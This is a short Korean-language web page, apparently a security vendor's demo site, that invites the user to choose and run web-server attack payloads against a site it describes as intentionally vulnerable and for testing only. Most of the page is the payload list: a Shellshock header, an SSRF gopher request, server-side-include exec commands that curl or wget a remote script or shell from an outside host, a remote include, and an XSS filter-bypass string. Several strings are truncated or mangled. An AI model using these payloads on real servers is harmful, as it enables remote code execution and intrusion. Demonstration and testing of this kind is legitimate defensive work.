PoC
홈
웹 공격
API
로그인
PoC
홈
웹 공격
API
로그인
웹 서버 취약점 공격을 시작해 보세요.
공격 페이로드를 선택하고 실행하세요!
웹 서버 취약점 공격
str ExitWindowsEx
AVAK$(RETURN_CODE)OS
() {:;}; echo Content-type:text/plain; echo;/bin/cat test.html
curl -s -i -X POST -d 'url=gopher://127.0.0.1:53/_%2500%
!--#echo var='script_filename' -->
!--#echo var='path_info_translated' -->
!--#exec cmd='curl http://sn1persecurity.com/.testing/rfi_vuln.php' -->
!--#exec cmd='wget http://website.com/dir/shell.txt' -->
!--#include virtual='http://sn1persecurity.com/.testing/rfi_vuln.php' -->
>alert(/Chrome%20XSS%20filter%20bypass/);>">x=esi:assign name='var1 ' value=''cript''/>sesi:vars name='$(var1)'
pre>!--#echo var='DATE_LOCAL' -->
공격 실행
경고:
본 웹사이트는 테스트 목적으로만 사용되는 의도적으로 취약하게 설계된 데모용 웹사이트입니다.
©
Monitorapp.
All Right Reserved